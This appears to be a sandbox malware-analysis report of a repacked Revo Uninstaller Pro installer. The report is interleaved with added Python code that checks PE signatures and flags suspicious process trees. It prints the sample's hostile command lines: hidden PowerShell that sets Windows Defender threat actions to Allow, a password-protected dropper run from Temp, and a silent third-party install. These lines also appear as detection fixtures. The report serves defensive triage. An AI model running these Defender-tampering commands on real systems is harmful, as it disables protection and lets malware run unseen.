Windows Analysis Report
Revo.Uninstaller.Pro.v5.3.4.exe

Overview

General Information

Sample name: Revo.Uninstaller.Pro.v5.3.4.exe
Analysis ID: 1571786
MD5: 881464f03502d44e29e5fea8b4c35538
SHA1: 8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
SHA256: 2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
Tags: exe, user-Bacn

Detection

Score: 44
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Loading BitLocker PowerShell Module
Possible COM Object hijacking
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Classes Autorun Keys Modification
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Suspicious Rundll32 Setupapi.dll Activity
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
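The signature list above says the sample is not signed and that it drops a device driver (revoflt.sys, in three variants). The following is an added example written for this page, not code from Joe Sandbox or from VS Revo Group: a stdlib-only Python check for whether a PE file carries an embedded Authenticode signature, i.e. whether the IMAGE_DIRECTORY_ENTRY_SECURITY entry of the optional header points at a WIN_CERTIFICATE structure. It is the first thing to run against both the submitted sample and each dropped .sys before trusting the "not signed" verdict. Two caveats are built in: the function only reports presence and type of the blob and does not validate the certificate chain, and a result of `None` does not prove a driver is unsigned, because drivers are routinely catalog-signed with no embedded blob. The `build_test_pe` helper fabricates a header-only PE so the example runs offline; it is a constructed fixture, not a real binary, and the DER bytes it embeds are a placeholder, not a real PKCS#7 signature.

```python
import struct

# Index of the Authenticode (security) entry among the PE data directories.
IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002   # WIN_CERTIFICATE.wCertificateType used by Authenticode
WIN_CERT_REVISION_2_0 = 0x0200

# Offset of the first data directory inside the optional header, keyed by its magic (PE32, PE32+).
_DATA_DIR_OFFSET = {0x10B: 96, 0x20B: 112}


def embedded_signature(data: bytes):
    """Return a descriptor of the embedded Authenticode blob, or None if the PE has none.

    Unlike every other directory, the security entry's VirtualAddress is a raw file
    offset. It points at a WIN_CERTIFICATE: dwLength, wRevision, wCertificateType,
    then bCertificate[] (DER PKCS#7 SignedData). Malformed input raises ValueError.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)                 # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt_off = pe_off + 4 + 20                                        # skip the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt_off)
    dir_off = _DATA_DIR_OFFSET.get(magic)
    if dir_off is None:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    (n_dirs,) = struct.unpack_from("<I", data, opt_off + dir_off - 4)  # NumberOfRvaAndSizes
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    entry = opt_off + dir_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    cert_off, cert_size = struct.unpack_from("<II", data, entry)
    if cert_off == 0 or cert_size == 0:
        return None
    if cert_off + cert_size > len(data):
        raise ValueError("security directory points outside the file (truncated or tampered)")
    length, revision, cert_type = struct.unpack_from("<IHH", data, cert_off)
    if length < 8 or length > cert_size:
        raise ValueError("WIN_CERTIFICATE length inconsistent with the directory size")
    return {
        "offset": cert_off,
        "size": cert_size,
        "revision": revision,
        "cert_type": cert_type,
        "is_authenticode": cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA,
        "pkcs7": data[cert_off + 8:cert_off + length],   # hand this to a real verifier (signtool, osslsigncode)
    }


def build_test_pe(signed: bool, pe32plus: bool = False) -> bytes:
    """Constructed fixture: a header-only PE, optionally with a security directory entry."""
    magic = 0x20B if pe32plus else 0x10B
    dir_off = _DATA_DIR_OFFSET[magic]
    opt_size = dir_off + 16 * 8                       # 16 data directories, all zero
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, dir_off - 4, 16)      # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE header right after the DOS stub
    headers_len = 0x40 + 4 + len(coff) + opt_size
    cert = b""
    if signed:
        fake_pkcs7 = b"\x30\x82\x00\x0e" + b"\x00" * 14   # placeholder DER, not a real signature
        length = 8 + len(fake_pkcs7)
        cert = struct.pack("<IHH", length, WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + fake_pkcs7
        struct.pack_into("<II", opt, dir_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8, headers_len, length)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + cert


def classify_file(path: str) -> str:
    """Triage verdict for one file on disk, e.g. the sample or a dropped revoflt.sys."""
    with open(path, "rb") as fh:
        sig = embedded_signature(fh.read())
    if sig is None:
        return "no embedded signature (check catalog signing before calling it unsigned)"
    if not sig["is_authenticode"]:
        return f"embedded certificate of unexpected type 0x{sig['cert_type']:04x}"
    return f"embedded Authenticode blob, {len(sig['pkcs7'])} bytes of PKCS#7 (validate the chain separately)"
```

Run `classify_file` over the sample and over each revoflt.sys the installer writes; the `pkcs7` bytes are what a chain validator consumes, and a security directory that points past end-of-file is itself a finding, since it usually means the file was truncated or patched after signing.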

Classification

  • System is w10x64
  • Revo.Uninstaller.Pro.v5.3.4.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe" MD5: 881464F03502D44E29E5FEA8B4C35538)
    • rundll32.exe (PID: 7724 cmdline: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf MD5: EF3179D498793BF4234F708D3BE28633)
      • runonce.exe (PID: 7784 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
        • grpconv.exe (PID: 7820 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
    • regsvr32.exe (PID: 7956 cmdline: regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • RevoUninPro.exe (PID: 8000 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • ruplp.exe (PID: 8048 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT MD5: 216B49B7EB7BE44D7ED7367F3725285F)
    • RevoUninPro.exe (PID: 8128 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • cmd.exe (PID: 1620 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PACK.EXE (PID: 3756 cmdline: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123 MD5: A868E9C0A97C2EF80602C0F6634913F8)
        • powershell.exe (PID: 1260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ya.exe (PID: 4420 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe" MD5: 7ACCFDE96C04320BA099144A7BE710CC)
          • OperaSetup.exe (PID: 7852 cmdline: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0 MD5: 5A1105F1C25A60B128D45EC03041BF48)
            • setup.exe (PID: 8040 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=… MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 1640 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 2252 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="… " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
                • setup.exe (PID: 8056 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
  • ruplp.exe (PID: 1188 cmdline: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding MD5: 216B49B7EB7BE44D7ED7367F3725285F)
  • cleanup
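The process tree above is the part of this report a responder would turn into detection logic: a self-extracting archive written to %TEMP% (PACK.EXE, built with the WinRAR SFX stub according to the sfxrar.pdb path later in the report) launches hidden, non-interactive PowerShell three times to set a Windows Defender ThreatIDDefaultAction of Allow, then runs ya.exe from its own extraction folder. The block below is an added example written for this page, not code from Joe Sandbox, VS Revo Group or any of the Sigma rules listed: it replays constructed process-creation events copied from the command lines above, walks parent/child links, and flags the three behaviours. The field names (`pid`, `ppid`, `image`, `cmdline`) are an assumed minimal schema rather than any vendor's event format. The `Remove-MpPreference` lines it emits are the standard cmdlet for undoing such allow entries and must be run elevated on the affected host; the threat-ID numbers are passed through as the report prints them, since the page does not say which detections they correspond to.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed schema, not a vendor format)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    parent_image: str
    detail: str
    hidden_window: bool = False


# Constructed from the process tree in the report; only the branch of interest is reproduced.
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MP_CMD = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nologo -noninteractive '
          '-windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids {tid} '
          '-ThreatIDDefaultAction_Actions Allow -Force"')
SAMPLE_EVENTS = [
    ProcEvent(7324, 0, r"C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe",
              r'"C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"'),
    ProcEvent(7724, 7324, r"C:\Windows\System32\rundll32.exe",
              r"RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 "
              r"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf"),
    ProcEvent(7784, 7724, r"C:\Windows\System32\runonce.exe", r'"C:\Windows\system32\runonce.exe" -r'),
    ProcEvent(1620, 7324, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123'),
    ProcEvent(3756, 1620, r"C:\Users\user\AppData\Local\Temp\PACK.EXE",
              r"C:\Users\user\AppData\Local\Temp\PACK.EXE -p123"),
    ProcEvent(1260, 3756, POWERSHELL, MP_CMD.format(tid=2147781989)),
    ProcEvent(7620, 3756, POWERSHELL, MP_CMD.format(tid=2147735505)),
    ProcEvent(1244, 3756, POWERSHELL, MP_CMD.format(tid=2147814523)),
    ProcEvent(4420, 3756, r"C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe",
              r'"C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"'),
]

ADD_MP_RE = re.compile(r"\bAdd-MpPreference\b", re.IGNORECASE)
THREAT_IDS_RE = re.compile(r"-ThreatIDDefaultAction_Ids\s+([\d,]+)", re.IGNORECASE)
THREAT_ACTION_RE = re.compile(r"-ThreatIDDefaultAction_Actions\s+(\w+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)   # -w / -windowStyle
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
INF_RE = re.compile(r"setupapi(?:\.dll)?,InstallHinfSection\s+(\S+)\s+(\d+)\s+(.+?\.inf)\s*$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def index_by_pid(events):
    return {e.pid: e for e in events}


def lineage(pid, by_pid):
    """Ancestor images of `pid`, nearest parent first; stops at an unknown or looping ppid."""
    chain, seen, ev = [], set(), by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        chain.append(ev.image)
    return chain


def triage(events):
    by_pid = index_by_pid(events)
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_image = parent.image if parent else ""
        img = basename(e.image).lower()
        if img == "powershell.exe" and ADD_MP_RE.search(e.cmdline):
            ids, action = THREAT_IDS_RE.search(e.cmdline), THREAT_ACTION_RE.search(e.cmdline)
            if ids and action and action.group(1).lower() == "allow":
                findings.append(Finding("defender_threat_allow", e.pid, parent_image, ids.group(1),
                                        hidden_window=bool(HIDDEN_RE.search(e.cmdline))))
        if img == "rundll32.exe":
            m = INF_RE.search(e.cmdline)
            if m:
                # runonce.exe -r, grpconv -o and the RunOnce\GrpConv key are setupapi's normal
                # side effects of processing an INF; the INF path is what needs review.
                findings.append(Finding("inf_install_via_rundll32", e.pid, parent_image, m.group(3)))
        if TEMP_RE.search(e.image):
            spawned = [c for c in children.get(e.pid, []) if basename(c.image).lower() == "powershell.exe"]
            if spawned:
                findings.append(Finding("temp_binary_spawns_powershell", e.pid, parent_image,
                                        f"{len(spawned)} powershell.exe children"))
    return findings


def allowed_threat_ids(findings):
    ids = set()
    for f in findings:
        if f.rule == "defender_threat_allow":
            ids.update(int(x) for x in f.detail.split(",") if x)
    return sorted(ids)


def remediation_commands(threat_ids):
    """PowerShell to undo the allow entries; run elevated on the affected host."""
    return [f"Remove-MpPreference -ThreatIDDefaultAction_Ids {tid}" for tid in threat_ids]


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.rule:32} pid={f.pid:<5} parent={basename(f.parent_image):12} {f.detail}")
    for cmd in remediation_commands(allowed_threat_ids(found)):
        print(cmd)
```

The lineage walk is what makes the Defender finding actionable: the three PowerShell processes chain back through PACK.EXE and cmd.exe to the installer itself, so the whole branch, not just the PowerShell commands, is in scope for containment. On a live host, confirm the tampering with `Get-MpPreference | Select-Object ThreatIDDefaultAction_Ids, ThreatIDDefaultAction_Actions` before and after running the emitted removal commands.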
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
10.0.ruplp.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 3756, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 1260, ProcessName: powershell.exe
      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 7956, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\(Default)
      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7724, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
      Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine|base64offset|contains: [HZ, Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe", ParentImage: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe, ParentProcessId: 7324, ParentProcessName: Revo.Uninstaller.Pro.v5.3.4.exe, ProcessCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ProcessId: 7724, ProcessName: rundll32.exe
      Source: Process started | Author: Konstantin Grishchenko, oscd.community | Data: Command: "C:\Windows\system32\runonce.exe" -r, CommandLine: "C:\Windows\system32\runonce.exe" -r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\runonce.exe, NewProcessName: C:\Windows\System32\runonce.exe, OriginalFileName: C:\Windows\System32\runonce.exe, ParentCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7724, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\system32\runonce.exe" -r, ProcessId: 7784, ProcessName: runonce.exe
      Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, NewProcessName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, OriginalFileName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, ProcessId: 1188, ProcessName: ruplp.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 3756, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 1260, ProcessName: powershell.exe
      No Suricata rule has matched

      AV Detection

      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkg | ReversingLabs: Detection: 29%
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | ReversingLabs: Detection: 29%
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | ReversingLabs: Detection: 25%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.5% probability
      Source: Revo.Uninstaller.Pro.v5.3.4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.inf
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.inf
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdf
